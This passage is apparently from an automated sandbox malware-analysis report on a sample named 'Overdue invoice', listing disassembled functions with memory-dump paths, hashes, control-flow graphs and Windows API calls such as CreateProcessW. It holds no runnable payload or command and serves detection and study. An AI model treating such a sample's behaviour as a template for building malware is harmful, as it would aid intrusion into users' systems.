                                                                          • Opcode Fuzzy Hash: 713a49118d3f5b0aaf329e266d9c42188f4fc88a4413f579405d07980f0eee66
                                                                          • Instruction Fuzzy Hash: CBE19BB5A2820ADFCB14CFA5D4858EEFBB2FF89311F10855BD405AB254D734A982CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07266420 Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",03,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",02,", xrefs: 072665B7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",03,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",02,"
                                                                          • API String ID: 0-832420553
                                                                          • Opcode ID: 7608a95375236c4cb3b22e9c66c2fe5b33aa681a4d6a100f38466f879ed4f232
                                                                          • Instruction ID: 71efcf3ed19c8b1d52dbcaeb07bee2f21f4a41de27bd86d0b3840327f423da04
                                                                          • Opcode Fuzzy Hash: 7608a95375236c4cb3b22e9c66c2fe5b33aa681a4d6a100f38466f879ed4f232
                                                                          • Instruction Fuzzy Hash: F3D129B4D2420ADFCB14CF96C5858AEFBB6FF89300F14C55AD416AB254D734AA82CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0726424D Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1v{i
                                                                          • API String ID: 0-3238669819
                                                                          • Opcode ID: 81b83a723897fda3614e7cef32ccfb2779bc44f2bdb064d7ef468a3dbb3aade0
                                                                          • Instruction ID: eda3ada1bc4ca23d4ef06b64efe565b09032b09be1a3d9a6ac63af8d599a9257
                                                                          • Opcode Fuzzy Hash: 81b83a723897fda3614e7cef32ccfb2779bc44f2bdb064d7ef468a3dbb3aade0
                                                                          • Instruction Fuzzy Hash: E2A13875E102588FCB08DFE9D8846DEBBB2EF89310F24942AD419BB355D7349A82CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0726D688 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: k3bo
                                                                          • API String ID: 0-1636335931
                                                                          • Opcode ID: 22a6734c040f1b54ebcaa84d0e48cb4737470bb900ee2bc06e1ae325b8e16129
                                                                          • Instruction ID: 7c890c177ddb41ad06e5ae275d94891db97fee9db08cfc5f844a6eb3f8e95921
                                                                          • Opcode Fuzzy Hash: 22a6734c040f1b54ebcaa84d0e48cb4737470bb900ee2bc06e1ae325b8e16129
                                                                          • Instruction Fuzzy Hash: A7B137B0F256598BCF04CFE9C5896DEFBF2AF89310F14C52AD408AB255E7349981CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 072642C8 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1v{i
                                                                          • API String ID: 0-3238669819
                                                                          • Opcode ID: 8865c865d65f395d4b737c0b6308cc8e1d268f41890b591b724e8a392cd4f067
                                                                          • Instruction ID: 43d7ebe0e9b9c98a7f92884453816a546c72719d73063de5ceac929e6ab47edc
                                                                          • Opcode Fuzzy Hash: 8865c865d65f395d4b737c0b6308cc8e1d268f41890b591b724e8a392cd4f067
                                                                          • Instruction Fuzzy Hash: 8391D2B4E242598FCB08DFE9C984AEEFBB2EF89340F24902AD419BB254D7745941CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 027319B0 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ['_v
                                                                          • API String ID: 0-2215613000
                                                                          • Opcode ID: f2eef15a19e516950fecc1f99284a0c4a661345179f6effdf2949dd3dae17776
                                                                          • Instruction ID: 1f9e09e2bf2f8feb8bc5ab4230ba3e645962cdf46428e81bb8f466667e1f8493
                                                                          • Opcode Fuzzy Hash: f2eef15a19e516950fecc1f99284a0c4a661345179f6effdf2949dd3dae17776
                                                                          • Instruction Fuzzy Hash: 71616C70D1620CDFDB05CFE9E6806DDFBB6BB89311F64A52AD009B7255E3348946CB28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 027319C0 Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ['_v
                                                                          • API String ID: 0-2215613000
                                                                          • Opcode ID: e74eb198530bada359a5197a5c7fd1c56ad50f57f71d5b2990679c3e643e1c87
                                                                          • Instruction ID: 264f51c25498c3ee70a5b9b3444c1b7867c30cc564b271be4c20abed7813f27c
                                                                          • Opcode Fuzzy Hash: e74eb198530bada359a5197a5c7fd1c56ad50f57f71d5b2990679c3e643e1c87
                                                                          • Instruction Fuzzy Hash: AE617B70D1620CEBDB05CFE9E5806DDFBB6FB89311F64A42AD009B7255E7349942CB28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07264B58 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ;N9a
                                                                          • API String ID: 0-1213979650
                                                                          • Opcode ID: 039d61a8a714da9dd26bb5ed2e05412456f4f829c2b2d14964a8d63568884c6d
                                                                          • Instruction ID: 4e8b0c007f45c8a423b1ede8a6527bf44f80e3d4205b82dd4ded2a94ba9adae8
                                                                          • Opcode Fuzzy Hash: 039d61a8a714da9dd26bb5ed2e05412456f4f829c2b2d14964a8d63568884c6d
                                                                          • Instruction Fuzzy Hash: 1A5126B4E14259CFDB08DFAAD8446AEFBF2FF89300F14C16AD459A7250D7345A818F68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07264B68 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ;N9a
                                                                          • API String ID: 0-1213979650
                                                                          • Opcode ID: 451fa82793897303bb59ce40064bf5e951857f8c6c70495322d3c3a41994cfee
                                                                          • Instruction ID: 479604929cb0aeea66806b207a86fe74fb21077446bb76170309d2309aff45dc
                                                                          • Opcode Fuzzy Hash: 451fa82793897303bb59ce40064bf5e951857f8c6c70495322d3c3a41994cfee
                                                                          • Instruction Fuzzy Hash: 235114B4E14259CFDB08DFAAC8446AEFBF2BF89300F14C06AD419B7250D7345A818F68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 072632F0 Relevance: .4, Instructions: 369COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5a0a0b79dc9431eef6897cd6bb2738ff28b5c85f118313ff17493b41ea973370
                                                                          • Instruction ID: 47643cefc2ff75ee3777ba8d0174a72270d860fb0700e2373a956fd98015b834
                                                                          • Opcode Fuzzy Hash: 5a0a0b79dc9431eef6897cd6bb2738ff28b5c85f118313ff17493b41ea973370
                                                                          • Instruction Fuzzy Hash: 72D1DBB0B142068FCB25DF78C88856EBBE6AF85204F2A846AD405DB396DF71DD81C791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07265530 Relevance: .1, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4c7dab4c436d9773b76be3b2abe76bb2e2b2c3d3ef84d13cc07e44d57711edee
                                                                          • Instruction ID: 0499923d4da64df77361a251c4cf9693c4180f57d4b33578c2042b0860d8756b
                                                                          • Opcode Fuzzy Hash: 4c7dab4c436d9773b76be3b2abe76bb2e2b2c3d3ef84d13cc07e44d57711edee
                                                                          • Instruction Fuzzy Hash: AA21F5B1E106189BEB18CFABD8442DEFBF7AFC9310F14C06AD408A7258DB3419958F80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07268AB0 Relevance: .1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ef2458b9c587317345c6d6aea3d2118018727c8392f1103e911db8ede6006ceb
                                                                          • Instruction ID: f30316d35b5edb53aa1536db07137831c08770d852472b6765d5d77da27dde6c
                                                                          • Opcode Fuzzy Hash: ef2458b9c587317345c6d6aea3d2118018727c8392f1103e911db8ede6006ceb
                                                                          • Instruction Fuzzy Hash: 5821E0B1E116189BEB58CFABD84469EF7F7AFC8200F04C576C408A7254DB3059868F51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07265520 Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d7949362d23137ecfea2bbadac9089ae80b123b4c857636dcfa6f701fb79535f
                                                                          • Instruction ID: ce4fcc3df6120e51076fceafca6f240a5eedb26a98922dd07194518089f0f9d3
                                                                          • Opcode Fuzzy Hash: d7949362d23137ecfea2bbadac9089ae80b123b4c857636dcfa6f701fb79535f
                                                                          • Instruction Fuzzy Hash: DC21B3B0E106589BEB18CFA7D94539EBBB7AFC9310F14C06AD408A6258DB741996CB40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C2B523 Relevance: 6.1, APIs: 4, Instructions: 127threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 84 c2b523-c2b529 85 c2b52e-c2b5a1 GetCurrentProcess 84->85 86 c2b52c-c2b52d 84->86 87 c2b5a3-c2b5a9 85->87 88 c2b5aa-c2b5de GetCurrentThread 85->88 86->85 87->88 89 c2b5e0-c2b5e6 88->89 90 c2b5e7-c2b61b GetCurrentProcess 88->90 89->90 91 c2b624-c2b63c 90->91 92 c2b61d-c2b623 90->92 104 c2b63f call c2b6e0 91->104 105 c2b63f call c2bec8 91->105 106 c2b63f call c2bed8 91->106 92->91 96 c2b645-c2b674 GetCurrentThreadId 97 c2b676-c2b67c 96->97 98 c2b67d-c2b6df 96->98 97->98 104->96 105->96 106->96
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 00C2B590
                                                                          • GetCurrentThread.KERNEL32 ref: 00C2B5CD
                                                                          • GetCurrentProcess.KERNEL32 ref: 00C2B60A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00C2B663
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 14ca1d203fc7c10893b156bae0a29782df8a860070c72d1453a97aca22567287
                                                                          • Instruction ID: 5658ebc266b318f360d1e07985851b4d2c99192170f83265bcd545953c2d330c
                                                                          • Opcode Fuzzy Hash: 14ca1d203fc7c10893b156bae0a29782df8a860070c72d1453a97aca22567287
                                                                          • Instruction Fuzzy Hash: 455175B0D046498FDB14CFAAD548BDEBBF0EF89314F24846DE419A7390CB745948CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C2B530 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 107 c2b530-c2b5a1 GetCurrentProcess 108 c2b5a3-c2b5a9 107->108 109 c2b5aa-c2b5de GetCurrentThread 107->109 108->109 110 c2b5e0-c2b5e6 109->110 111 c2b5e7-c2b61b GetCurrentProcess 109->111 110->111 112 c2b624-c2b63c 111->112 113 c2b61d-c2b623 111->113 125 c2b63f call c2b6e0 112->125 126 c2b63f call c2bec8 112->126 127 c2b63f call c2bed8 112->127 113->112 117 c2b645-c2b674 GetCurrentThreadId 118 c2b676-c2b67c 117->118 119 c2b67d-c2b6df 117->119 118->119 125->117 126->117 127->117
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 00C2B590
                                                                          • GetCurrentThread.KERNEL32 ref: 00C2B5CD
                                                                          • GetCurrentProcess.KERNEL32 ref: 00C2B60A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00C2B663
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: a3863b2e281dc8433b80ef4884afaff03a818ae1c52a169a4e5ac0d49b4bfa21
                                                                          • Instruction ID: 329de2be4c761e62c2c6b6c0df958fde72fcae70b93ac9250d5616943515bf03
                                                                          • Opcode Fuzzy Hash: a3863b2e281dc8433b80ef4884afaff03a818ae1c52a169a4e5ac0d49b4bfa21
                                                                          • Instruction Fuzzy Hash: 895152B0D006498FDB14CFAAD548B9EBBF0EF88314F24846DE419A7790C774A948CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C2F900 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 215 c2f900-c2f92a 216 c2f92e 215->216 217 c2f92c-c2f92d 215->217 218 c2f932-c2f942 216->218 219 c2f930-c2f931 216->219 217->216 220 c2f946-c2f962 218->220 221 c2f944 218->221 219->218 223 c2f966-c2f96a 220->223 224 c2f964 220->224 221->220 225 c2f96e 223->225 226 c2f96c-c2f96d 223->226 224->223 227 c2f972-c2f974 225->227 228 c2f970-c2f971 225->228 226->225 229 c2f980-c2f98a 227->229 228->227 230 c2f98e 229->230 231 c2f98c-c2f98d 229->231 232 c2f992-c2f9a2 230->232 233 c2f990-c2f991 230->233 231->230 234 c2f9a6-c2f9aa 232->234 235 c2f9a4 232->235 233->232 236 c2f9ae 234->236 237 c2f9ac 234->237 235->234 238 c2f9b2-c2f9c2 236->238 239 c2f9b0 236->239 237->229 237->236 240 c2f9c6-c2f9e2 238->240 241 c2f9c4 238->241 239->238 242 c2f9e6-c2f9ea 240->242 243 c2f9e4 240->243 241->240 244 c2f9ee 242->244 245 c2f9ec-c2f9ed 242->245 243->242 246 c2f9f2-c2f9f8 244->246 247 c2f9f0-c2f9f1 244->247 245->244 248 c2fa5a-c2fabe 246->248 249 c2f9fa 246->249 247->246 252 c2fac0-c2fac6 248->252 253 c2fac9-c2fad0 248->253 250 c2f9fe-c2fa02 249->250 251 c2f9fc 249->251 254 c2fa06 250->254 255 c2fa04-c2fa05 250->255 251->250 252->253 256 c2fad2-c2fad8 253->256 257 c2fadb-c2fb7a CreateWindowExW 253->257 258 c2fa0a-c2fa38 call c2d834 254->258 259 c2fa08-c2fa09 254->259 255->254 256->257 262 c2fb83-c2fbbb 257->262 263 c2fb7c-c2fb82 257->263 264 c2fa3d-c2fa3e 258->264 259->258 268 c2fbc8 262->268 269 c2fbbd-c2fbc0 262->269 263->262 270 c2fbc9 268->270 269->268 270->270
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e3e3a6b1a2337cbe0119fbe34f5df98b46d9dfc76c1c70fd6380a43fa9ed2eed
                                                                          • Instruction ID: 7caec89f4ecc3e5ded5fe6c6725ed1de50094364a74c60dabdb1a847910e2abb
                                                                          • Opcode Fuzzy Hash: e3e3a6b1a2337cbe0119fbe34f5df98b46d9dfc76c1c70fd6380a43fa9ed2eed
                                                                          • Instruction Fuzzy Hash: 3491A171805388AFDB12DFA9D8519DDBFB0FF4A310F1980AEE454AB663C3349986CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C29530 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 271 c29530-c29545 call c2911c 274 c29547-c29555 call c297a8 271->274 275 c2955b-c2955f 271->275 274->275 279 c29690-c29750 274->279 276 c29573-c295b4 275->276 277 c29561-c2956b 275->277 282 c295c1-c295cf 276->282 283 c295b6-c295be 276->283 277->276 319 c29752-c29755 279->319 320 c29758-c29783 GetModuleHandleW 279->320 285 c295f3-c295f5 282->285 286 c295d1-c295d6 282->286 283->282 289 c295f8-c295ff 285->289 287 c295e1 286->287 288 c295d8-c295df call c29128 286->288 291 c295e3-c295f1 287->291 288->291 292 c29601-c29609 289->292 293 c2960c-c29613 289->293 291->289 292->293 296 c29620-c29629 call c29138 293->296 297 c29615-c2961d 293->297 302 c29636-c2963b 296->302 303 c2962b-c29633 296->303 297->296 304 c29659-c2965d 302->304 305 c2963d-c29644 302->305 303->302 324 c29660 call c29ac0 304->324 325 c29660 call c29a91 304->325 305->304 306 c29646-c29656 call c29148 call c29158 305->306 306->304 309 c29663-c29666 312 c29668-c29686 309->312 313 c29689-c2968f 309->313 312->313 319->320 321 c29785-c2978b 320->321 322 c2978c-c297a0 320->322 321->322 324->309 325->309
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: c4af6ed27b78ffde14e348fb771944d4f9cdbcba58799ab830f1d987668c3b65
                                                                          • Instruction ID: f20907403ea5dba7240e7d5d57b6e7c256d3fb5b009c9ca7000c90b98439d09d
                                                                          • Opcode Fuzzy Hash: c4af6ed27b78ffde14e348fb771944d4f9cdbcba58799ab830f1d987668c3b65
                                                                          • Instruction Fuzzy Hash: 2C713570A00B158FDB64DF2AD44579ABBF1FF89304F108A2DE49AD7A40D774E905CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 027332FE Relevance: 1.6, APIs: 1, Instructions: 147processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 327 27332fe-2733301 328 2733303-2733339 327->328 329 273333f-2733393 327->329 328->329 332 2733395-273339b 329->332 333 273339e-27333a5 329->333 332->333 334 27333b0-27333c6 333->334 335 27333a7-27333ad 333->335 336 27333d1-273346e CreateProcessW 334->336 337 27333c8-27333ce 334->337 335->334 339 2733470-2733476 336->339 340 2733477-27334eb 336->340 337->336 339->340 348 27334fd-2733504 340->348 349 27334ed-27334f3 340->349 350 2733506-2733515 348->350 351 273351b 348->351 349->348 350->351 352 273351c 351->352 352->352
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 0273345B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: c5b31ccf4fa0d9dfed5978f6a6bc735c237319ff6a70f12d3341e23be974ad7f
                                                                          • Instruction ID: 6fd69f01bc24422cb7c7c81f8b85e8eff6bee589b43e1ceb33f7ce5b1f63f457
                                                                          • Opcode Fuzzy Hash: c5b31ccf4fa0d9dfed5978f6a6bc735c237319ff6a70f12d3341e23be974ad7f
                                                                          • Instruction Fuzzy Hash: 55512771D00328DFDB61CF99C880BDDBBB1AF48314F15809AE508B7210DB359A89CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02733308 Relevance: 1.6, APIs: 1, Instructions: 143processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 354 2733308-2733393 357 2733395-273339b 354->357 358 273339e-27333a5 354->358 357->358 359 27333b0-27333c6 358->359 360 27333a7-27333ad 358->360 361 27333d1-273346e CreateProcessW 359->361 362 27333c8-27333ce 359->362 360->359 364 2733470-2733476 361->364 365 2733477-27334eb 361->365 362->361 364->365 373 27334fd-2733504 365->373 374 27334ed-27334f3 365->374 375 2733506-2733515 373->375 376 273351b 373->376 374->373 375->376 377 273351c 376->377 377->377
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 0273345B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 87cacd388e4578f9c38bfd7bd8ba4c96c5af719e8712c159d7daa78bc182e5e7
                                                                          • Instruction ID: c54da181a9273c561f82166b302561c4935cbeeef564507c9ee0f6110f20bf92
                                                                          • Opcode Fuzzy Hash: 87cacd388e4578f9c38bfd7bd8ba4c96c5af719e8712c159d7daa78bc182e5e7
                                                                          • Instruction Fuzzy Hash: 42510671900328DFDB61CF99C880BDDBBB1AF49314F15809AE908B7210DB759A88CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C2FA4D Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 545 c2fa4d-c2fa4e 546 c2fa52 545->546 547 c2fa50 545->547 548 c2fa56-c2fabe 546->548 549 c2fa54-c2fa55 546->549 547->546 551 c2fac0-c2fac6 548->551 552 c2fac9-c2fad0 548->552 549->548 551->552 553 c2fad2-c2fad8 552->553 554 c2fadb-c2fb13 552->554 553->554 555 c2fb1b-c2fb7a CreateWindowExW 554->555 556 c2fb83-c2fbbb 555->556 557 c2fb7c-c2fb82 555->557 561 c2fbc8 556->561 562 c2fbbd-c2fbc0 556->562 557->556 563 c2fbc9 561->563 562->561 563->563
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C2FB6A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 99541292d94c189e9f9175911bdf6fa3c8e01575e98b28dacf6c44561b198a40
                                                                          • Instruction ID: 2e4126179cee5d8235e27ef219a7091763c6b0a830f01c4bb7fc072e3a69c6ef
                                                                          • Opcode Fuzzy Hash: 99541292d94c189e9f9175911bdf6fa3c8e01575e98b28dacf6c44561b198a40
                                                                          • Instruction Fuzzy Hash: C451CFB1D00359DFDF14CFAAD880ADEBBB5BF48314F24812AE818AB650D7709946CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C2FA58 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 564 c2fa58-c2fabe 565 c2fac0-c2fac6 564->565 566 c2fac9-c2fad0 564->566 565->566 567 c2fad2-c2fad8 566->567 568 c2fadb-c2fb13 566->568 567->568 569 c2fb1b-c2fb7a CreateWindowExW 568->569 570 c2fb83-c2fbbb 569->570 571 c2fb7c-c2fb82 569->571 575 c2fbc8 570->575 576 c2fbbd-c2fbc0 570->576 571->570 577 c2fbc9 575->577 576->575 577->577
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C2FB6A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 4354bf80d7be27e9dbeaa55786009424a5740975750b2af2e18672da1be5ad83
